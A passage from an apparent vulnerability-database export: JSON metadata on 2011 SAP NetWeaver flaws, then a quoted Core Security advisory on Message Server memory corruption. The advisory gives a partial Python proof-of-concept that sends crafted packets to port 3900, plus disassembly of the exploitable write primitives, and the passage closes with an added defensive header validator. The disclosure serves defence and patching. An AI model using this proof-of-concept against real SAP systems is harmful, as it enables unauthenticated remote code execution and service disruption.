    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      }
    ],
    "trust": 6.093194613333333
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 5.6
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      }
    ]
  },
  "last_update_date": "2024-07-23T22:41:20.004000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Acknowledgments to Security Researchers - 1546307",
        "trust": 0.8,
        "url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
      },
      {
        "title": "Patch for SAP NetWeaver Cross-Site Request Forgery Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/5913"
      },
      {
        "title": "Patch for SAP NetWeaver Feature Access Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/5922"
      },
      {
        "title": "Patch for SAP NetWeaver Command Injection Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/5912"
      },
      {
        "title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/5909"
      },
      {
        "title": "Patch for SAP NetWeaver Path Injection Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/5911"
      },
      {
        "title": "Patch for SAP NetWeaver \u0027page\u0027 parameter cross-site scripting vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/5910"
      },
      {
        "title": "SAP Netweaver Script Injection Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/5908"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4707"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://dsecrg.com/pages/vul/show.php?id=336"
      },
      {
        "trust": 1.7,
        "url": "https://service.sap.com/sap/support/notes/1546307"
      },
      {
        "trust": 1.7,
        "url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/520554/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
      },
      {
        "trust": 0.9,
        "url": "http://dsecrg.com/pages/vul/show.php?id=341"
      },
      {
        "trust": 0.9,
        "url": "http://dsecrg.com/pages/vul/show.php?id=335"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4707"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4707"
      },
      {
        "trust": 0.6,
        "url": "http://dsecrg.com/pages/vul/show.php?id=340http"
      },
      {
        "trust": 0.6,
        "url": "http://dsecrg.com/pages/vul/show.php?id=339http"
      },
      {
        "trust": 0.6,
        "url": "http://dsecrg.com/pages/vul/show.php?id=336http"
      },
      {
        "trust": 0.6,
        "url": "http://dsecrg.com/pages/vul/show.php?id=338http"
      },
      {
        "trust": 0.6,
        "url": "http://dsecrg.com/pages/vul/show.php?id=337http"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/520554/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://erpscan.com/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
      },
      {
        "trust": 0.3,
        "url": "http://dsecrg.com/pages/vul/show.php?id=337"
      },
      {
        "trust": 0.3,
        "url": "http://dsecrg.com/pages/vul/show.php?id=339"
      },
      {
        "trust": 0.3,
        "url": "http://dsecrg.com/pages/vul/show.php?id=340"
      },
      {
        "trust": 0.3,
        "url": "http://dsecrg.com/pages/vul/show.php?id=338"
      },
      {
        "trust": 0.3,
        "url": "http://www.sap.com/platform/netweaver/index.epx"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/79.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.securityfocus.com/bid/50680"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-4707"
      },
      {
        "db": "BID",
        "id": "50680"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-122"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4707"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-4707"
      },
      {
        "db": "BID",
        "id": "50680"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-122"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4707"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-11-16T00:00:00",
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "IVD",
        "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "IVD",
        "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "IVD",
        "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "IVD",
        "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "IVD",
        "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "IVD",
        "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      },
      {
        "date": "2011-12-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2011-4707"
      },
      {
        "date": "2011-11-15T00:00:00",
        "db": "BID",
        "id": "50680"
      },
      {
        "date": "2011-12-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      },
      {
        "date": "2011-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201112-122"
      },
      {
        "date": "2011-12-08T19:55:03.720000",
        "db": "NVD",
        "id": "CVE-2011-4707"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      },
      {
        "date": "2018-12-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2011-4707"
      },
      {
        "date": "2013-02-14T12:21:00",
        "db": "BID",
        "id": "50680"
      },
      {
        "date": "2011-12-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      },
      {
        "date": "2011-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201112-122"
      },
      {
        "date": "2018-12-10T19:29:00.420000",
        "db": "NVD",
        "id": "CVE-2011-4707"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-122"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SAP NetWeaver Cross-Site Request Forgery Vulnerability",
    "sources": [
      {
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site scripting",
    "sources": [
      {
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
      }
    ],
    "trust": 1.4
  }
}

VAR-202001-0833

Vulnerability from variot - Updated: 2024-07-23 22:37

A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver contains an array index validation vulnerability that may result in a denial-of-service (DoS) condition. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user supplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string, NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the handling of messages with opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens on port 3900 by default. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s, SAP Netweaver 7.01 SR1, SAP Netweaver 7.02 SP06, SAP Netweaver 7.30 SP04.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

CORE-2012-1128

  1. Advisory Information

Title: SAP Netweaver Message Server Multiple Vulnerabilities
Advisory ID: CORE-2012-1128
Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities
Date published: 2013-02-13
Date of last update: 2013-02-13
Vendors contacted: SAP
Release mode: Coordinated release

2. Vulnerability Information

Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1592, CVE-2013-1593

3. Vulnerability Description

By sending different messages, the different vulnerabilities can be triggered.

4. Vulnerable packages

. Older versions are probably affected too, but they were not checked.

5. Non-vulnerable packages

. Vendor did not provide this information.

6. Vendor Information, Solutions and Workarounds

SAP released the security note 1800603 [2] regarding these issues.

7. Credits

Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

8. Technical Description / Proof of Concept Code

The following python script is the main PoC that can be used to reproduce all vulnerabilities described below:

/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900)
(options, args) = parser.parse_args()

client_string = '-'+' '*39
server_name = '-'+' '*39

def send_packet(sock, packet):
    # Message Server packets are prefixed with a 4-byte big-endian length
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

def receive(sock):
    length = sock.recv(4)
    (length, ) = struct.unpack("!I", length)
    data = ""
    while len(data)<length:
        data+= sock.recv(length)
    return (length, data)

def initialize_connection(hostname, port):
    global server_name   # the parsed server name is used later by send_attack

    # Connect
    print "[*] Connecting to", hostname, "port", port
    connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connection.connect((hostname, port))

    # Send initialization packet
    print "[*] Connected, sending login request"

    init = '**MESSAGE**\x00'   # eyecatcher
    init+= '\x04'              # version
    init+= '\x00'              # errorno
    init+= client_string       # toname
    init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key
    init+= '\x01\x08'          # flag / iflag (MS_LOGIN_2)
    init+= client_string       # fromname
    init+= '\x00\x00'          # padd
    send_packet(connection, init)

    # Receive response
    print "[*] Receiving login reply"
    (length, data) = receive(connection)

    # Parsing login reply
    server_name = data[4+64:4+64+40]

    return connection

# Main PoC body (send_attack must be defined before this point; see 8.1 and 8.2)
connection = initialize_connection(options.hostname, options.port)
send_attack(connection)
-----/

In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.

8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module.

The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows:

/-----
00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type)
00000000 senderclusterid dd ?
00000004 clusterid dd ?
00000008 serviceid dd ?
0000000C groupid dd ?
00000010 nodetype db ?
00000011 db ?                ; undefined
00000012 db ?                ; undefined
00000013 db ?                ; undefined
00000014 totallength dd ?
00000018 currentlength dd ?
0000001C currentoffset dd ?
00000020 totalblocks db ?
00000021 currentblock db ?
00000022 db ?                ; undefined
00000023 db ?                ; undefined
00000024 messagetype dd ?
00000028 MSJ2EE_HEADER ends
-----/

The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT':

/-----
.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]
.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>)
.data:0090B9E0                         ; DATA XREF: _MsJ2EE_AddStatistics+24o
.data:0090B9E0                         ; _MsJ2EE_AddStatistics+4Co ...
-----/

This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function:

/-----
mov     edi, [ebp+pJ2eeHeader]
mov     eax, [edi+MSJ2EE_HEADER.serviceid]              ; attacker controls MSJ2EE_HEADER.serviceid
xor     ecx, ecx
cmp     dword ptr j2ee_stat_total.totalMsgCount+4, ecx
lea     esi, [eax+eax*8]
lea     esi, j2ee_stat_services.totalMsgCount[esi*8]    ; using the index without validating array bounds
-----/

Since the 'serviceid' value is first multiplied by 9 and then multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct:

/-----
00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)
00000000                           ; XREF: .data:j2ee_stat_totalr
00000000                           ; .data:j2ee_stat_servicesr
00000000 totalMsgCount dq ?        ; XREF: _MsJ2EE_AddStatistics+1Br
00000000                           ; _MsJ2EE_AddStatistics+2Fr ...
00000008 totalMsgLength dq ?       ; XREF: _MsJ2EE_AddStatistics+192r
00000008                           ; _MsJ2EE_AddStatistics+19Br ...
00000010 avgMsgLength dq ?         ; XREF: _MsJ2EE_AddStatistics+1C2w
00000010                           ; _MsJ2EE_AddStatistics+1C7w ...
00000018 maxLength dq ?            ; XREF: _MsJ2EE_AddStatistics+161r
00000018                           ; _MsJ2EE_AddStatistics+16Er ...
00000020 noP2PMessage dq ?         ; XREF: _MsJ2EE_AddStatistics:loc_44D442w
00000020                           ; _MsJ2EE_AddStatistics+158w ...
00000028 noP2PRequest dq ?         ; XREF: _MsJ2EE_AddStatistics+144w
00000028                           ; _MsJ2EE_AddStatistics+14Aw ...
00000030 noP2PReply dq ?           ; XREF: _MsJ2EE_AddStatistics+132w
00000030                           ; _MsJ2EE_AddStatistics+138w ...
00000038 noBroadcastMessage dq ?   ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw
00000038                           ; _MsJ2EE_AddStatistics+123w ...
00000040 noBroadcastRequest dq ?   ; XREF: _MsJ2EE_AddStatistics+10Fw
00000040                           ; _MsJ2EE_AddStatistics+115w ...
00000048 MSJ2EE_STAT_ELEMENT ends
-----/

However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below:

/-----
At this point:
 * ESI points to an arbitrary, attacker-controlled memory address
 * EBX == 1

.text:0044D359 movzx   eax, [ebp+msiflag]
.text:0044D35D sub     eax, 0Ch
.text:0044D360 jz      short loc_44D37C
.text:0044D362 sub     eax, ebx
.text:0044D364 jnz     short loc_44D39D
.text:0044D366 cmp     [ebp+msflag], 2
.text:0044D36A jnz     short loc_44D374
.text:0044D36C add     [esi+40h], ebx        ; iflag=0xd, flag=2 => add 1 to [esi+0x40]
.text:0044D36F adc     [esi+44h], ecx
.text:0044D372 jmp     short loc_44D39D
.text:0044D374 ; ---------------------------------------------------------------------------
.text:0044D374
.text:0044D374 loc_44D374:                   ; CODE XREF: _MsJ2EE_AddStatistics+7Aj
.text:0044D374 add     [esi+38h], ebx        ; iflag=0xd, flag=1 => add 1 to [esi+0x38]
.text:0044D377 adc     [esi+3Ch], ecx
.text:0044D37A jmp     short loc_44D39D
.text:0044D37C ; ---------------------------------------------------------------------------
.text:0044D37C
.text:0044D37C loc_44D37C:                   ; CODE XREF: _MsJ2EE_AddStatistics+70j
.text:0044D37C mov     al, [ebp+msflag]
.text:0044D37F cmp     al, 3
.text:0044D381 jnz     short loc_44D38B
.text:0044D383 add     [esi+30h], ebx        ; iflag=0xc, flag=3 => add 1 to [esi+0x30]
.text:0044D386 adc     [esi+34h], ecx
.text:0044D389 jmp     short loc_44D39D
.text:0044D38B ; ---------------------------------------------------------------------------
.text:0044D38B
.text:0044D38B loc_44D38B:                   ; CODE XREF: _MsJ2EE_AddStatistics+91j
.text:0044D38B cmp     al, 2
.text:0044D38D jnz     short loc_44D397
.text:0044D38F add     [esi+28h], ebx        ; iflag=0xc, flag=2 => add 1 to [esi+0x28]
.text:0044D392 adc     [esi+2Ch], ecx
.text:0044D395 jmp     short loc_44D39D
.text:0044D397 ; ---------------------------------------------------------------------------
.text:0044D397
.text:0044D397 loc_44D397:                   ; CODE XREF: _MsJ2EE_AddStatistics+9Dj
.text:0044D397 add     [esi+20h], ebx        ; iflag=0xc, flag=1 => add 1 to [esi+0x20]
.text:0044D39A adc     [esi+24h], ecx

[...]
-----/

And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives:

/-----
.text:0044D3B7 add     [esi], ebx                           ; add 1 to [esi]
.text:0044D3B9 adc     dword ptr [esi+4], 0
.text:0044D3BD mov     eax, [edi+MSJ2EE_HEADER.totallength] ; MSJ2EE_HEADER.totallength is fully controlled by the attacker
.text:0044D3C0 cdq
.text:0044D3C1 add     [esi+8], eax                         ; add an arbitrary number to [esi+8]
-----/

This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server.
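As an added example (not the advisory's PoC and not SAP's code), the following Python 3 routine parses the 'MSJ2EE_HEADER' layout listed above and performs the checks that '_MsJ2EE_AddStatistics' omits before touching the per-service counters: the index must fall inside 'j2ee_stat_services[256]', and 'totallength', which the listing sign-extends with 'cdq', must not be negative. Little-endian field order, the block-range sanity check and all helper names are assumptions; the rejected sample uses the advisory's own out-of-range 'serviceid' value.

```python
import struct

# MSJ2EE_HEADER as listed in the advisory (sizeof=0x28): senderclusterid,
# clusterid, serviceid, groupid (dd); nodetype (db) + 3 undefined bytes;
# totallength, currentlength, currentoffset (dd); totalblocks, currentblock
# (db) + 2 undefined bytes; messagetype (dd). Little-endian is assumed here
# (x86 in-memory layout); the advisory does not state the wire byte order.
MSJ2EE_HEADER_FMT = "<IIIIB3xIIIBB2xI"
MSJ2EE_HEADER_LEN = struct.calcsize(MSJ2EE_HEADER_FMT)  # 40 == 0x28
MSJ2EE_FIELDS = ("senderclusterid", "clusterid", "serviceid", "groupid",
                 "nodetype", "totallength", "currentlength", "currentoffset",
                 "totalblocks", "currentblock", "messagetype")

# j2ee_stat_services is declared with 256 elements in the advisory listing.
J2EE_STAT_SERVICES_LEN = 256


class HeaderRejected(ValueError):
    """Raised when an MSJ2EE_HEADER must not be used for accounting."""


def build_header(**fields):
    """Constructed sample input: pack an MSJ2EE_HEADER from keyword fields
    (unset fields are zero). Hypothetical helper, not from the advisory."""
    values = [fields.get(name, 0) for name in MSJ2EE_FIELDS]
    return struct.pack(MSJ2EE_HEADER_FMT, *values)


def parse_header(buf):
    """Unpack the fixed-size header; reject truncated input instead of
    reading past the end of the buffer."""
    if len(buf) < MSJ2EE_HEADER_LEN:
        raise HeaderRejected("header truncated: %d < %d bytes"
                             % (len(buf), MSJ2EE_HEADER_LEN))
    values = struct.unpack_from(MSJ2EE_HEADER_FMT, buf, 0)
    return dict(zip(MSJ2EE_FIELDS, values))


def validate_header(hdr, stat_len=J2EE_STAT_SERVICES_LEN):
    """The checks missing from the _MsJ2EE_AddStatistics listing (CWE-129):
    the index must lie inside j2ee_stat_services, and totallength, which the
    code sign-extends (cdq) before adding it, must be non-negative."""
    if hdr["serviceid"] >= stat_len:
        raise HeaderRejected("serviceid 0x%08x outside j2ee_stat_services[%d]"
                             % (hdr["serviceid"], stat_len))
    if hdr["totallength"] >= 1 << 31:
        raise HeaderRejected("totallength 0x%08x is negative as int32"
                             % hdr["totallength"])
    # Assumed sanity check, not stated in the advisory: the current block
    # must lie inside the total message.
    if hdr["currentoffset"] + hdr["currentlength"] > hdr["totallength"]:
        raise HeaderRejected("current block exceeds totallength")
    return hdr


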